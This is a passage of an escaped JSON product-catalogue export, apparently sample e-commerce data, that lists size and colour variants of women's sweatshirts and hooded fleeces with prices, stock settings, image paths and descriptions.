Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ariel-roll-sleeve-sweatshirt-l-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh09-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh09-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh09-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh09-purple_alt1.jpg,\\/w\\/h\\/wh09-purple_back.jpg\",\"image\":\"\\/w\\/h\\/wh09-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh09-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh09-purple_alt1.jpg,\\/w\\/h\\/wh09-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Purple\"},\"1111\":{\"sku\":\"WH09-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Ariel Roll Sleeve Sweatshirt-L-Red\",\"description\":\"<p>Soft, sleek and subtle, the Ariel Roll Sleeve Sweatshirt is a nuanced fitness garment for all occasions. It works equally well as a workout piece or in a casual social setting.<\\/p>\\n<p>&bull; Purple two-tone lightweight hoodie. <br \\/>&bull; 100% cotton.<br \\/>&bull; Adjustable roll sleeves for Long-Sleeve or 3\\/4 sleeve.<br \\/>&bull; Casual, comfy piece for running errands or weekend activities.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ariel-roll-sleeve-sweatshirt-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh09-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh09-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh09-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh09-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh09-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"1112\":{\"sku\":\"WH09-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Ariel Roll Sleeve Sweatshirt-XL-Green\",\"description\":\"<p>Soft, sleek and subtle, the Ariel Roll Sleeve Sweatshirt is a nuanced fitness garment for all occasions. It works equally well as a workout piece or in a casual social setting.<\\/p>\\n<p>&bull; Purple two-tone lightweight hoodie. <br \\/>&bull; 100% cotton.<br \\/>&bull; Adjustable roll sleeves for Long-Sleeve or 3\\/4 sleeve.<br \\/>&bull; Casual, comfy piece for running errands or weekend activities.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ariel-roll-sleeve-sweatshirt-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh09-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh09-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh09-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh09-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh09-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Green\"},\"1113\":{\"sku\":\"WH09-XL-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Ariel Roll Sleeve Sweatshirt-XL-Purple\",\"description\":\"<p>Soft, sleek and subtle, the Ariel Roll Sleeve Sweatshirt is a nuanced fitness garment for all occasions. It works equally well as a workout piece or in a casual social setting.<\\/p>\\n<p>&bull; Purple two-tone lightweight hoodie. <br \\/>&bull; 100% cotton.<br \\/>&bull; Adjustable roll sleeves for Long-Sleeve or 3\\/4 sleeve.<br \\/>&bull; Casual, comfy piece for running errands or weekend activities.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ariel-roll-sleeve-sweatshirt-xl-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh09-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh09-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh09-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh09-purple_alt1.jpg,\\/w\\/h\\/wh09-purple_back.jpg\",\"image\":\"\\/w\\/h\\/wh09-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh09-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh09-purple_alt1.jpg,\\/w\\/h\\/wh09-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Purple\"},\"1114\":{\"sku\":\"WH09-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Ariel Roll Sleeve Sweatshirt-XL-Red\",\"description\":\"<p>Soft, sleek and subtle, the Ariel Roll Sleeve Sweatshirt is a nuanced fitness garment for all occasions. It works equally well as a workout piece or in a casual social setting.<\\/p>\\n<p>&bull; Purple two-tone lightweight hoodie. <br \\/>&bull; 100% cotton.<br \\/>&bull; Adjustable roll sleeves for Long-Sleeve or 3\\/4 sleeve.<br \\/>&bull; Casual, comfy piece for running errands or weekend activities.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ariel-roll-sleeve-sweatshirt-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh09-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh09-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh09-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh09-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh09-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"1115\":{\"sku\":\"WH09\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Ariel Roll Sleeve Sweatshirt\",\"description\":\"<p>Soft, sleek and subtle, the Ariel Roll Sleeve Sweatshirt is a nuanced fitness garment for all occasions. It works equally well as a workout piece or in a casual social setting.<\\/p>\\n<p>&bull; Purple two-tone lightweight hoodie. <br \\/>&bull; 100% cotton.<br \\/>&bull; Adjustable roll sleeves for Long-Sleeve or 3\\/4 sleeve.<br \\/>&bull; Casual, comfy piece for running errands or weekend activities.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh09-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh09-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh09-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Hoodie|Pullover,material=Cotton,pattern=Color-Blocked,climate=Indoor|Mild|Spring|Warm,eco_collection=Yes,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WH09-XS-Green,size=XS,color=Green|sku=WH09-XS-Purple,size=XS,color=Purple|sku=WH09-XS-Red,size=XS,color=Red|sku=WH09-S-Green,size=S,color=Green|sku=WH09-S-Purple,size=S,color=Purple|sku=WH09-S-Red,size=S,color=Red|sku=WH09-M-Green,size=M,color=Green|sku=WH09-M-Purple,size=M,color=Purple|sku=WH09-M-Red,size=M,color=Red|sku=WH09-L-Green,size=L,color=Green|sku=WH09-L-Purple,size=L,color=Purple|sku=WH09-L-Red,size=L,color=Red|sku=WH09-XL-Green,size=XL,color=Green|sku=WH09-XL-Purple,size=XL,color=Purple|sku=WH09-XL-Red,size=XL,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh09-purple_alt1.jpg,\\/w\\/h\\/wh09-purple_back.jpg\",\"image\":\"\\/w\\/h\\/wh09-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh09-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh09-purple_alt1.jpg,\\/w\\/h\\/wh09-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Hoodie|Pullover\",\"material\":\"Cotton\",\"pattern\":\"Color-Blocked\",\"climate\":\"Indoor|Mild|Spring|Warm\",\"eco_collection\":\"Yes\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1116\":{\"sku\":\"WH10-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Helena Hooded Fleece-XS-Blue\",\"description\":\"<p>Wear this hoodie after the gym or before a chilly weather bike ride. Either way, this versatile sweatshirt offers an effortlessly appealing silhouette and a super-comfy fit. Smooth, stretchy fabric creates flattering shape, while the full-zip placket and hood help block gusty winds.<\\/p>\\n<p>Full zip. <br \\/>Banded cuffs and waist. <br \\/>Front pockets. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"55\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helena-hooded-fleece-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh10-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh10-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh10-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh10-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh10-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"1117\":{\"sku\":\"WH10-XS-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Helena Hooded Fleece-XS-Gray\",\"description\":\"<p>Wear this hoodie after the gym or before a chilly weather bike ride. Either way, this versatile sweatshirt offers an effortlessly appealing silhouette and a super-comfy fit. Smooth, stretchy fabric creates flattering shape, while the full-zip placket and hood help block gusty winds.<\\/p>\\n<p>Full zip. <br \\/>Banded cuffs and waist. <br \\/>Front pockets. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"55\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helena-hooded-fleece-xs-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh10-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh10-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh10-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh10-gray_alt1.jpg,\\/w\\/h\\/wh10-gray_back.jpg\",\"image\":\"\\/w\\/h\\/wh10-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh10-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh10-gray_alt1.jpg,\\/w\\/h\\/wh10-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Gray\"},\"1118\":{\"sku\":\"WH10-XS-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Helena Hooded Fleece-XS-Yellow\",\"description\":\"<p>Wear this hoodie after the gym or before a chilly weather bike ride. Either way, this versatile sweatshirt offers an effortlessly appealing silhouette and a super-comfy fit. Smooth, stretchy fabric creates flattering shape, while the full-zip placket and hood help block gusty winds.<\\/p>\\n<p>Full zip. <br \\/>Banded cuffs and waist. <br \\/>Front pockets. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"55\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helena-hooded-fleece-xs-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh10-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh10-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh10-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Yellow\",\"qty\":\"